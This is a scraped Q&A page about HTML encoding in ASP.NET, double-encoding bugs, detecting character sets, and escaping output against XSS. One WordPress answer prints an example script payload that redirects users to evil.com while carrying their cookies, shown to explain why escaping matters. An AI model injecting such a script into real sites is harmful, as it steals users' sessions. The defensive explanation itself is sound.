Microsoft.Security.Application.Encoder.HtmlEncode preventing single quotes from rendering - asp.net

As a security measure we're using the Microsoft.Security.Application.Encoder.HtmlEncode method to encode and render values that have been stored in our database by various users.
We would like to allow the user to use single quotes but they are being encoded as & #39;
Does anyone know of a safe way to allow single quotes to render but ensure the rest of the input is encoded? Is it just a case of replacing after the encoding has taken place? This approach seems a bit hacky.

I got to the bottom of this. The web control was also encoding the input data and therefore html encoding was taking place twice.

Related

Encoder.HtmlEncode encodes Farsi characters

I want to use the Microsoft AntiXss library for my project. When I use the Microsoft.Security.Application.Encoder.HtmlEncode(str) function to safely show some value in my web page, it encodes Farsi characters which I consider to be safe. For instance, it converts لیست to لیست. Am I using the wrong function? How should I be able to print the user input in my page safely?
I'm currently using it like this:
<h2>#Encoder.HtmlEncode(ViewBag.UserInput)</h2>
I think I messed up! Razor view encodes the values unless you use #Html.Raw right? Well, I encoded the string and it encoded it again. So in the end it just got encoded twice and hence, the weird looking chars (Unicode values)!
If your encoding (lets assume that it's Unicode by default) supports Farsi it's safe to use Farsi, without any additional effort, in ASP.NET MVC almost always.
First of all, escape-on-input is just wrong - you've taken some input and applied some transformation that is totally irrelevant to that data. It's generally wrong to encode your data immediately after you receive it from the user. You should store the data in pure view to your database and encode it only when you display it to the user and according to the possible vulnerabilities for the current system. For example the 'dangerous' html characters are not 'dangerous' for SQL or android etc. and that's one of the main reasons why you shouldn't encode the data when you store it in the server. And one more reason - when you html encode the string you got 6-7 times more characters for your string. This can be a problem with server constraints for strings length. When you store the data to the sql server you should escape, validate, sanitize your data only for it and prevent only its vulnerabilities (like sql injection).
Now for ASP.NET MVC and razor you don't need to html encode your strings because it's done by default unless you use Html.Raw() but generally you should avoid it (or html encode when you use it). Also if you double encode your data you'll result in corrupted output :)
I Hope this will help to clear your mind.

Why must I escape data prior to rendering it for the end user in WordPress?

I understand why incoming data must be sanitized before it is saved to the database.
Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?
http://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data#Escaping:_Securing_Output
Because if you do not you could be making your site vulnerable to XSS.
Data is displayed to users via a combination of HTML and JavaScript, if you do not escape, user set JavaScript could be output to the page and executed (rather than simply displayed as it does on StackOverflow).
e.g. if incoming data is saved into your database, it may still contain JavaScript code within the HTML. e.g. <script>document.location="evil.com?" + escape(document.cookie)</script>
This would have the effect of redirecting whichever user views the page to www.evil.com, passing all cookies (which could include the session ID of the user, compromising the user's session via session hijacking). However, this is often done in a more subtle fashion so the user is not being aware that they are being attacked, like setting a URL of an <img> tag to pass along the cookies, or even embed a keylogger within the page.
Escaping needs to be done per output context, so it must be done when output rather than when input. Examples of output context are HTML, JavaScript, and CSS and they all have their own escaping (encoding) rules that must be followed to ensure your output is safe. e.g. & in HTML is & whilst in JavaScript it should be encoded as \x26. This will ensure the character is correctly interpreted by the language as the literal rather than as a control character.
Please see the OWASP XSS Prevention Cheat Sheet for more details.
Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps insure you're not letting someone inject anything unwanted into your page.
It's not as huge of a risk as forgetting input validation (well okay maybe let's say "not as vulnerable to script kiddies but still a huge risk if you piss off someone smart"), but the idea is you want to prevent cross site scripting. This article does a nice job giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/

How to detect wrong encoding declaration?

I am building a ASP.NET webservice loading other webpages and then hand it clients.
I have been doing quite well with character code treatment, reading the meta tag from HTML then use that codeset to read the file.
But nevertheless, some less educated users just don't understand code sets. They declare a specific encoding method e.g. "gb2312", but in fact, he is just using normal UTF8. When I use gb2312 to decode the text, everything turns out a holy mess.
How can I detect whether the text is properly decoded? I loaded that page into my IE, which correctly use UTF-8 to decode the page. How does it achieve that?
Based on the BOM you can tell what encoding is used.
BOM and encoding
If you want to detect character set you could use the C# port of mozilla's character set detector.
CharDetSharp
If you want to make it extra sure that you are using a correct one, you maybe could be looking for special characters that are not supposed to be there. It is not very likely to include "óké". So you could be looking for such characters and try to use different encoding/character set to process your file.
Actually it is really hard to make your application completely "fool-proof".

To HTMLENCODE or not to HTMLENCODE user input on web form (asp.net vb)

I have many params making up an insert form for example:
x.Parameters.AddWithValue("#city", City.Text)
I had a failed xss attack on the site this morning, so I am trying to beef up security measures anyway....
Should I be adding my input params like this?
x.Parameters.AddWithValue("#city", HttpUtility.HtmlEncode(City.Text))
Is there anything else I should consider to avoid attacks?
Don't encode input. Do encode output. At some point in the future, you might decide you want to use the same data to produce PDF or a Word document (or something else), at which point you won't want it to be HTML.
When you are accepting data, it is just data.
When you are inserting data into a database, it needs to be converted to make sense for the database.
When you are inserting data into an HTML document, it needs to be converted to make sense for HTML.
… and so on.
I strongly recommending looking at the OWASP XSS Prevention Cheat Sheet. It helps classify the different areas of a html document you can inject into, and a recipe for how to encode your output appropriately for each location.
Know that you can't just universally trust a function like htmlEncode() and expecct it to be a magic pill for all ills. To quote from the OWASP document linked:
Why Can't I Just HTML Entity Encode Untrusted Data?
HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a tag. It even sort of works for untrusted data that goes into attributes, particularly if you're religious about using quotes around your attributes. But HTML entity encoding doesn't work if you're putting untrusted data inside a tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into. That's what the rules below are all about.
Take time to understand exactly how and why XSS works. Then just follow these 7 rules and you'll be safe.

How have Html entities inside asp.net page?

Inside an asp.net page, should I use
<html><title>My page's title from México</title></html>
Or
<html><title>My page’s title from México</title></html>
Both examples have the same output. Since asp.net encodes all my pages to utf-8, there is no need to use html entities, is that right?
The ASCII table is set of characters, arguable the first standardized set of characters back in the days when you could only spare 1 byte per character. http://asciitable.com/ But I did some looking around at the extended character set of ASCII and it appears that the character you are referencing is an ASCII character. So there really isn't a problem which ever way you choose to display your title.
My revised answer is go for less expensive one according to space (i.e. the first one)
The second example will ensure compatibility with ASCII standards of HTML transmition. So my vote is for the second example, so you don't have to ensure the HTML is output and encoded as UTF-8 all the way through all the proxy servers and any other kind of caching and translation that might occur.
You're correct; As long as there's unicode at both ends of the pipe, it really doesn't matter. Personally, I would use the first simply because it's more readable.
And, honestly, unicode has been widespread for some time. I personally believe that it's time to leave anyone who can't handle UTF-8 behind.

Resources